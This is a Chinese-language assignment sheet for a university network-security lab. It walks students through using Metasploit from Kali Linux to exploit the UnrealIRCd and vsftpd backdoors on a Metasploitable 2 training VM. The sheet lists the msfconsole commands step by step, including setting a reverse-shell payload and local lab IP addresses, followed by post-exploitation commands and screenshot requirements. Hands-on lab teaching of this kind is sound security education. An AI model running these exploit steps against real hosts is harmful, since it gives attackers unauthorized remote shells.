1. 期末報告已在作業區公告, 完成後可上傳
2. 把截圖貼在 word 檔案裡, 分別描述, 請以報告的格式撰寫
3. kali 和 meta 可用同一台機器執行
4. 允許在學校圖資處的 雲端機器中執行
說明
1. 參考 CSC Lab4: https://github.com/jumbokh/Network-class/blob/main/refers/lab4-instruction.pdf
2. 使用 metasploit-framework :
a. ircd
b. vsftpd
在 metasploitable vm 上留下你的學號的檔名, 如:
999999999.irc
999999999.ftp
截圖項目:
1. kali linux 登入
2. metasploitable 2 登入
3. 兩個系統的 ifconfig (網路項目)
4. 以 msfconsole 分別使用 irc 及 vsftp 後門漏洞模組登入metasploitable2 主機
留下檔案, 最後顯示 ls -l 檔案顯示
5. 在 metasploitable2 主機上打: sudo find / -name '99999999.*' -print
(將 99999999 換成你的學號)
*** 登入後指令, 參考 page 11, 12
執行 msfconsole
1. search ircd
2. use 0
3 set RHOST 10.0.2.6
4. set payload cmd/unix/reverse
5. set LHOST 10.0.2.5
6. exploit
等到 session open 後,
whoami
pwd
touch <your id>.ircd
ctrl-c
exit
2. vsftpd
1. search vsftpd
2. use 1
3. set RHOST 10.0.2.6
4. set payload cmd/unix/interact
5. set LHOST 10.0.2.5
6. exploit
等候 session open...
whoami
pwd
touch <your id>.vsftpd
ctrl-c
exit